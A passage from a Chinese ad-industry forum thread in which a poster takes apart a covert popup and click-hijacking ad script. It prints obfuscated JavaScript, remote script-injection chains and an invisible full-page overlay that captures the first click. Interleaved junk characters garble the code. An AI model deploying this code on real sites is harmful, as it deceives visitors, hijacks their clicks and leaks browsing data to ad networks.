  373.                         } / w- t9 A' S' I; n# M
  374.                         var _i = parseInt(divs[i].style.zIndex);
    . _2 f1 a# e2 b1 \. A
  375.                         if (_i && divs[i] != a && _i == 2147483647) {
    ) j" N. ^1 p) m
  376.                             divs[i].style.zIndex = _i - 1 4 g- _6 y9 D' p3 U
  377.                         }
    / Q! y* P( w+ j0 d8 J( H1 _
  378.                     } : E, b0 S+ C! d( ]+ d2 ?. X" w( U. f
  379.                     a.style.zIndex = '2147483647'
    * F6 ?4 @$ k0 D& o2 s6 Z" ]+ o9 E
  380.                 } catch(e) {}
    % x: N2 F/ N& C9 J3 v
  381.             }
    : b- H) L$ N" x( G0 a' e9 G8 y
  382.         },
    4 ^8 U3 T  o; V* @8 L4 N
  383.         120);
    1 k% D4 l$ n8 z* h: u
  384.         a.onclick = function(e) { $ v; k  ^! ?! i/ I
  385.             if (document.getElementById('__unionsky_push_d_object_box__') != null) { " v. `# S8 q. b  l4 Z
  386.                 form_div.parentNode.removeChild(form_div) " g% M+ o" V8 B, i3 Z- \' A
  387.             }
    - P" K8 P- {) K2 g
  388.             e = e || window.event;
    ) @" l) K( L0 f& ]
  389.             e.cancelBubble = true;
    4 v$ @6 P: V1 k( h4 c
  390.             setTimeout(function() {
    . T; K+ t0 P8 E6 K- P( i0 m6 s! P! U
  391.                 a.parentNode.removeChild(a)   b6 Q+ ~/ s; q& G6 }
  392.             },
    , |5 x- X0 G, y. f/ ^! M
  393.             200);
      H1 Y9 C. ]% v# K0 w8 x* K
  394.             clearInterval(m);
    ) D; b; c% h3 P
  395.             ads++; 2 q7 {3 i, s9 g6 y2 O- |/ c: E8 x: X
  396.             p(ckn, ckt, ads)
    , f# O5 ~) A1 K- r( u% N
  397.         };
    " O6 `. l, S& `. V' l
  398.         event(a, 'mouseup',
    4 @# k+ x) H8 K0 E; w3 _7 U
  399.         function(e) {
    ; a& P1 `$ \. a- B5 ^3 |1 l, N& ?
  400.             e = e || window.event;
    5 |2 |* L( p5 f
  401.             e.cancelBubble = true- S* ]& J+ r0 }6 ^- f( W7 s& V
  402.         }) 2 G3 B4 I7 g  C- v  U: s
  403.     }
    3 T+ ^' U8 D9 X; `* m
  404.     function func(url, param) {   E4 {, Y- ]! G& @6 j* u, E
  405.         var f = window[String.fromCharCode(111, 112, 101, 110)];
    + C. E' P* n' W' R$ [
  406.         var w = f(url, '_blank', 'left=0,top=0,toolbar=yes,location=yes,status=yes,menubar=yes,scrollbars=yes,resizable=yes,width=' + screen.width + ',height=' + screen.height); ; S2 s4 K2 |7 Y
  407.         if (w) { 3 V% x+ |  S) B. s0 R
  408.             ads++; 3 w* V" u2 B3 a1 T) [! i
  409.             p(ckn, ckt, ads)
    / N2 D) f/ x6 U8 G
  410.         }; 9 z: T( U, j# Q* v* ~# f
  411.         return w 2 ]: q. A7 h) e8 e# `( r
  412.     } 5 x: }6 }6 w& n  g! u; r' v, U$ f! S
  413.     function fstart(url) { , V( G# `9 K5 l& l4 l0 W
  414.         init(); 2 p- s' E- @% V
  415.         if (_ct >= 0) {
    ( U8 [# @( y9 W" `. J; T4 N+ V/ k
  416.             ckn = "YITIAN_NUM";
    9 f+ c  K- |! s
  417.             ckt = _ct 0 ]( {: d# G& R  T! l7 U% ~
  418.         } else {
    ) @# i( n9 \, b6 H" t
  419.             ckn = "YITIAN_ALL";
    ( B& ]; A* Z: X- B4 U, m5 z# f
  420.             ckt = Math.abs(_ct)
    * o+ M4 R  @7 Q$ B
  421.         }
    # p* U$ _" \& O- E8 a3 @' ]
  422.         if (ckt > 0) {
    - c/ ~( o! {; N( {: r( t; A
  423.             if (b(ckn)) {
    : m% L4 N2 N; G( u0 \' y/ G
  424.                 try {
    # j& ^* M" e; U* j# Y
  425.                     ads = parseFloat(b(ckn))
    & s  a; p' n, I8 r7 ~: e% Y( i
  426.                 } catch(q) {}
    # t6 Z* J1 a' u& o( ^# I
  427.             } 7 h( @7 G6 G9 b) l- ~
  428.         } 6 F! z) U' Z+ k  C6 a1 f, E% f7 u
  429.         if ((ads > 0 && ckn == 'YITIAN_ALL') || ads >= ytpp_ads) {
    5 A( A! ^# z) s
  430.             return) @& g3 ]3 \+ z1 U: c. U
  431.         } else {
    , b6 G- E' D: C! B( v
  432.             if (_le > 0) {
    ! a7 @4 h4 G; x& C2 C
  433.                 setTimeout(go(url), _le * 1000) ) C/ t& e# x  f. H- n8 @; o
  434.             } else {
    ! B) S" A; k0 c- \. O3 w- F
  435.                 go(url) 9 A7 P" y' R+ @: Z
  436.             }
    / K7 p- z  g6 b1 ]# b! x- O  j
  437.         }
    , U3 t: `  A, J- w& C
  438.     } , q& z9 H) R! S3 ?$ a% G
  439.     function go(url) {
    - `. d2 i$ t% d7 D$ P% Z- v
  440.         if (_poo == 1) {
    6 `$ Q% w5 g% O9 T
  441.             try {
    # r( X# y1 l3 o- {# `6 K  C
  442.                 func(url)
    ( N. ^% U: S% W+ J, G1 m
  443.             } catch(q) {} $ v) y* S$ K+ M8 G9 F* L, B5 q# M
  444.         } else if (_pco == 1) {
    - g- O& q+ k0 _- |
  445.             a_pop(url)
    ! n& x0 \4 U+ c+ I/ @5 [
  446.         } else {
    ! ?; N1 M6 o8 M
  447.             if (_pd == 1) {
    1 l* G  c+ K! S$ u+ s
  448.                 setTimeout(function() { - I" W$ D8 q2 Z, J/ y% y! r0 ~
  449.                     pop(url, { 4 p+ R  m% e, w6 s/ f
  450.                         a: 1, ! a' v* c. e, N2 h
  451.                         b: 2
    ) I  }. \' G! x5 |- ]0 |( e" W
  452.                     })
    ! Y% i/ F$ v; T# V# m
  453.                 }, 2 I: `% [6 V* z$ V1 M$ A( Y) B
  454.                 300) % D2 h8 N& b. N1 ~/ N, W  t. h
  455.             } : G; Z9 u# p$ `
  456.             if (_pd2 > Math.random()) { ; s) Y# ?1 A- \! p7 f$ d2 t- z
  457.                 setTimeout(function() { 6 S, e3 [3 m6 {8 I; d
  458.                     pop(url, {
    $ m, A/ b# r/ z( u8 N: f  l
  459.                         a: 1, ) X1 f- l5 x5 e7 D" ^5 r4 d- R
  460.                         b: 2
    5 }6 ~! B; x6 n6 }2 P
  461.                     }) : T. O* y' r+ u! r7 F! N2 k
  462.                 },
    , N: @9 E8 v+ ?3 ^) z
  463.                 300)
    - ?* t+ U6 G- {; m: Y
  464.             } : T5 _4 U' J) Y2 B
  465.             for (var i = 1; i <= 10; i++) {
    * c5 B; N* \* _& c
  466.                 var n = i == 1 ? "": i;
    , t% l, p4 z5 K. z. x, m/ m
  467.                 if (eval("_pt" + n + "b") > Math.random()) {
    0 ]8 q" q" j! ^: e0 P* }( I
  468.                     setTimeout(function() { . @5 N& \" }- Y( i) W) f9 P$ i5 k
  469.                         setTimeout(function() { : w6 B5 O3 k0 ]1 k) Z: l
  470.                             pop(url, {
    * m' a6 F. V: A. h/ F, N9 n# P% x
  471.                                 a: 1, - W1 ^' c3 C! U- W# ?( b4 k
  472.                                 b: 2
    6 w7 O& n2 h2 E) ^3 b
  473.                             }) . `' {4 x- ~# b; O1 l. W6 L" t
  474.                         }, ; _1 z! u( K4 [% ?1 O
  475.                         300)
    2 _+ ?- O3 [! }$ _
  476.                     }, # a- ?2 a- I, v- A! E
  477.                     parseInt(eval("_pt" + n + "a")) * 1000)
    ; @' T- B1 L2 c& Q- j/ w& G
  478.                 }
    ) P) F2 t- H5 |
  479.             } 5 O, ^6 A2 h) `) X+ o+ H, n8 f
  480.             if (_pc2 > Math.random()) { 3 y# }% {  E/ }7 [
  481.                 a_pop(url) 8 \8 G6 e5 O3 t
  482.             } ( T! j& O9 i: \9 A# m6 x3 }
  483.             if (_po > Math.random()) { / S* l9 T8 ~; p' j* c( ^! e
  484.                 try {
    ! z0 q8 Z% r' @% a
  485.                     func(url) , |! h9 ?1 M. E$ L. M  V/ F
  486.                 } catch(q) {}
    5 ^7 D* [" f0 I1 I8 {
  487.             }
    : E- R7 _% v/ L) ~( P9 ]# k) x% ~( x
  488.         }
    : N* f3 P. V4 m3 X
  489.     }; 5 d, U+ |0 x- v2 h3 S# g- ]
  490.     fstart(aa_url);
    7 Q- ^9 x, z. s4 k! a) t' ?
  491.     event(window, 'beforeunload', # [9 P) E1 I" ^% _
  492.     function() {}) - j  ^+ O3 ?: U8 ^/ |
  493. })();
复制代码
通过浏览器抓包
0 H  R% t, C+ zURL从这里产生6 T& I: t9 h6 y, g4 @, S

2 O3 J3 J, p6 E2 Z4 qhttp://play.unionsky.cn/show/?placeid=141830
- S) _- K5 m, x0 h: N2 d$ t( h7 a2 J  z

( y! R/ f) a% O5 q
相关帖子
回复

使用道具 举报

126

主题

62

广告币

394

积分

初级会员

Rank: 2

积分
394

社区QQ达人

 楼主| 发表于 2013-12-17 15:04:10 | 显示全部楼层
直接打开看不到什么东西4 M0 D! s: a! {& c8 N1 |9 Y1 S
http://www.unionsky.cn/ 是属于这个广告联盟的
0 o3 l% H2 c. b9 [我们直接分析抓包的内容# m1 t# t; \; ?: y5 `& e5 N
var ytpp_r = encodeURIComponent(encodeURIComponent(document.referrer));
( P! h! B$ R, J  J* N7 g: K# gytpp_r = ytpp_r.length > 1000 ? ytpp_r.substring(0, 1000) : ytpp_r;
' |! _0 o& }$ P& I0 B$ U% F2 hvar ytpp_u = encodeURIComponent(navigator.userAgent); ' ?7 y, ~6 C% C5 q
var ytpp_s = window.screen.width + "*" + window.screen.height;
, p  h9 u1 k/ T9 Lvar ytpp_l = navigator.browserLanguage || navigator.language;
8 v) m! Q: M: h, Z! Z- I# |var ytpp_plid = 141830;
' A+ h4 U; C3 v" O. O& ~6 J% Tvar ytpp_w = 0;
+ ~2 B  e  W! M  X' _3 pvar ytpp_h = 0;
  G  t6 c4 `1 X6 g% Zvar ytpp_url = "http://www.lxting.com/jmp/?p=f7xNjUO8Y80tB6KZyJ*jzRXjLuoZaOluHDv/IndJK1Z/mc0eKhM2QddlbEorugPwTAd08JIi*oDNYfaUSsF7QNBk3/CB3LW8&r=" + ytpp_r + "&u=" + ytpp_u + "&s=" + ytpp_s + "&l=" + ytpp_l + "&n=" + Math.random();
0 l) c& E. E1 }% w% K7 V- ivar ytpp_ads = 14;
0 Z7 ~" ]& j' x+ @8 evar ytpp_sti = 'CT:-3D:1C:1C2:1T:60,1T2:100,1;';
' m' y, l8 E! _) z& g; g$ Gdocument.write("<script language='javascript' type='text/javascript' src='http://www.lxting.com/pp/?p=f7xNjUO8Y81LybptxG2Vq//rYbtxQcP5GVnJOL07Ka8=&r=" + ytpp_r + "&u=" + ytpp_u + "&s=" + ytpp_s + "&l=" + ytpp_l + "&n=" + Math.random() + "'></script>");
0 N2 {6 f, }* y2 C) r/ N- jdocument.write("<script language='javascript' type='text/javascript' src='http://www.lxting.com/script/popup/v1_min.js'></script>");
4 h0 d1 v2 C8 v6 K0 G7 q6 x
那么这个http://play.unionsky.cn/show/?placeid=141830又是从哪里被引用进去呢。
$ t+ ?0 y, A( q! F继续分析 发现这里: Z3 [% a# o  L

* m3 z4 B2 U) A  jhttp://txsite.21tx.com/count/count.js* K# `+ l: X8 D! ^! L

0 T' z5 N) g& c1 E+ c7 i  O
txcount_uid = 1; 6 s# y0 m0 W1 m
txcount_uh = 0;
; t5 P3 [' n; z2 h0 w8 u1 v8 `" }txcount_uw = 0; ' q% I1 C+ P3 t0 H2 Y* ?
txcount_uah = 0;
8 t( P; X9 y1 ]' }( r- E  ctxcount_uaw = 0;
: U) F' V$ ]& P0 o& \2 Utxcount_ucd = 0; 0 z& P- h7 a5 H& W7 W6 u
   * A$ H0 m4 D- i# P" K4 A
if (window.screen) { . D6 E9 m7 |% e7 D' F
  txcount_uh = window.screen.height; 0 }+ M/ i  N9 s$ d9 }7 ^7 i" R# v
  txcount_uw = window.screen.width;
8 I1 h$ x2 G- t& ~! Y. b  txcount_uah = window.screen.availHeight;
9 x/ x" B9 P, C2 ?  txcount_uaw = window.screen.availWidth; 9 l5 q0 k& L2 E: }
  txcount_ucd = window.screen.colorDepth; 2 }: A, F5 i3 G1 r. L. o8 h( H
}
* ]; D5 A0 P8 ~# K   
3 k! L4 e; B4 h  t( h   5 L# |5 F! D! W
var url = "http://txsite.21tx.com/count/count.aspx";
) `7 H- Q9 s1 S3 f  r6 B7 z& Y+ burl = url + "?u="+ txcount_uid; 6 n" `& A0 |( t5 ~% r1 Z1 X' |8 D  W: g
//url = url + "&f=" + txcount_f; ) W% T8 I( `: ^1 @# m
url = url + "&k=" + txsite_pagekey;
9 ?6 w% X# d6 @  |: B' F//url = url + "&t=" + txcount_t;
& r6 {! U8 ?' T+ Y, G. [) gurl = url + "&l=" + escape(document.location); ; }; f& H+ M" q8 O% |
url = url + "&r=" + escape(document.referrer); % E/ a& f# i3 G  T! b3 [0 q
url = url + "&uh=" + txcount_uh;
9 g/ x+ g9 V2 N) F$ wurl = url + "&uw=" + txcount_uw;
- F. {# ?4 x: y( d3 D; O* q# }1 murl = url + "&uah=" + txcount_uah; : j2 A( _# b: }+ E
url = url + "&uaw=" + txcount_uaw; , |. m! z3 t1 Q% Z
url = url + "&ucd=" + txcount_ucd;
: L. H+ }7 A. u, x, P* W   5 Z' N8 d9 m. V
   . n7 V; ]' Z% U3 F
document.write("<script src=" + url + "><\/script>"); : m1 T5 H3 o; [  M
//document.write('<script src="http://s4.cnzz.com/stat.php?id=4820460&web_id=4820460" language="JavaScript" charset="gb2312"><\/script>'); ' E! T% M% f3 M
   
8 w6 H3 Q  L9 |! `: J2 [document.write('<script src="http://s127.cnzz.com/stat.php?id=1474936&web_id=1474936" language="JavaScript" charset="gb2312"><\/script>');
, _9 P9 k1 V/ F& m  P6 x0 B   
8 i0 s- a# i: |9 o6 I& t6 L" E   
1 o2 I8 v* Y1 Q) p( }, C2 h7 `document.write("<script language='javascript' src='http://play.unionsky.cn/show/?placeid=141830'><\/script>");
* `# H  S5 Z7 e! {

% u7 E  S. h3 p: w* [3 d% m/ ~! |) f一切昭然天下了。3 ?/ T7 X4 [# b. ~) g6 s) {- Z+ G
代码产生的直接效果如下+ t8 X$ A) A2 [* A' w

& L+ R" W+ b0 v9 M% p7 z <a  target="_blank" style="position: absolute; z-index: 2147483647; display: block; top: 0px; left: 0px; cursor: default; opacity: 0;"><div style="background-color: rgb(255, 255, 255); width: 1903px; height: 650px;"></div></a> * U, A% K. W' m4 ]3 C; t. A
  ~! I3 S5 u$ ^5 C
很隐秘的一段好代码* i' `& b1 G9 p  l7 _  O$ H9 m
回复 支持 反对

使用道具 举报

0

主题

480

广告币

1272

积分

高级会员

Rank: 4

积分
1272
发表于 2013-12-17 15:31:30 | 显示全部楼层
标记一下 好象看不懂还
回复 支持 反对

使用道具 举报

31

主题

247

广告币

782

积分

中级会员

Rank: 3Rank: 3

积分
782
发表于 2013-12-17 16:34:22 | 显示全部楼层
不清楚国内,莫非做taobao不可以直接用弹窗吗?
回复 支持 反对

使用道具 举报

4

主题

1230

广告币

1293

积分

高级会员

Rank: 4

积分
1293
发表于 2013-12-17 18:49:06 | 显示全部楼层
没用 360 搜狗 直接就拦截了,chrome可以弹出来
回复 支持 反对

使用道具 举报

54

主题

9

广告币

6010

积分

禁止访问

积分
6010
发表于 2013-12-17 19:34:38 | 显示全部楼层
adblock 完美屏蔽
回复 支持 反对

使用道具 举报

0

主题

91

广告币

97

积分

初级会员

Rank: 2

积分
97

社区QQ达人

发表于 2013-12-17 23:34:52 | 显示全部楼层
没研究全,期待跟多解析。
过往.
回复 支持 反对

使用道具 举报

6

主题

681

广告币

1089

积分

中级会员

Rank: 3Rank: 3

积分
1089

社区QQ达人

发表于 2013-12-18 00:52:13 | 显示全部楼层
代码看不懂,不过觉得挺好用的……自动弹窗
回复 支持 反对

使用道具 举报

49

主题

440

广告币

824

积分

中级会员

Rank: 3Rank: 3

积分
824
发表于 2013-12-18 01:24:03 | 显示全部楼层
没懂5 d8 a0 f( \& P0 x" Z  Q

: F/ G( m2 E( D7 E0 {/ \+ F1,首次访问有个弹窗,但是被chrome给拦截了. F: a8 n2 ^* A1 m" h( Q) q5 w) ?

  ?, [8 D6 F$ W# q" o" `, c2,劫持了第一次点击
/ v5 G: }' `4 f) a8 q0 N/ H$ b
7 A6 `' Y- x  p3,CS了一下unionsky
" Q* f: D4 T; C
: Y5 x9 @" g+ u( t: `5 J/ H: h然后?
回复 支持 反对

使用道具 举报

126

主题

62

广告币

394

积分

初级会员

Rank: 2

积分
394

社区QQ达人

 楼主| 发表于 2013-12-18 03:49:31 | 显示全部楼层
cissss 发表于 2013-12-18 01:24
0 s  N7 H6 n" M) G( q没懂# z8 d, h3 M* p2 L5 o. C  L& G+ b

+ z5 ?3 }7 P7 m# q- q( C1,首次访问有个弹窗,但是被chrome给拦截了
9 t1 Y$ @; P6 x+ P
懂的人一看就懂 不懂的人怎么看就不懂
回复 支持 反对

使用道具 举报

4

主题

428

广告币

706

积分

中级会员

Rank: 3Rank: 3

积分
706
发表于 2013-12-18 06:34:13 | 显示全部楼层
这个CJ怎么搞的这么复杂...
回复 支持 反对

使用道具 举报

49

主题

440

广告币

824

积分

中级会员

Rank: 3Rank: 3

积分
824
发表于 2013-12-18 17:31:57 | 显示全部楼层
小狠 发表于 2013-12-18 03:49 1 \( L& _  b# I1 B
懂的人一看就懂 不懂的人怎么看就不懂

9 a4 Q- p, _& w  m8 G我确实不懂你发这贴的意思。 可以理解为装逼么?
回复 支持 反对

使用道具 举报

0

主题

386

广告币

341

积分

初级会员

Rank: 2

积分
341

社区QQ达人

发表于 2014-3-14 13:10:39 | 显示全部楼层
不就是个弹窗代码吗?
回复 支持 反对

使用道具 举报

3

主题

88

广告币

113

积分

初级会员

Rank: 2

积分
113

社区QQ达人

发表于 2014-3-14 23:11:34 | 显示全部楼层
我表示看不懂
回复 支持 反对

使用道具 举报

4

主题

1

广告币

135

积分

初级会员

Rank: 2

积分
135

社区QQ达人

QQ
发表于 2014-3-15 12:03:35 | 显示全部楼层
占位,慢慢领会啥意思
http://faaad.com
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Binom

关于我们|联系我们|DMCA|广告服务|小黑屋|手机版|Archiver|Github|网站地图|AdvertCN

GMT+8, 2024-6-11 08:11 , Processed in 0.056834 second(s), 14 queries , Gzip On, MemCache On.

Copyright © 2001-2023, AdvertCN

Proudly Operating in Hong Kong.

快速回复 返回顶部 返回列表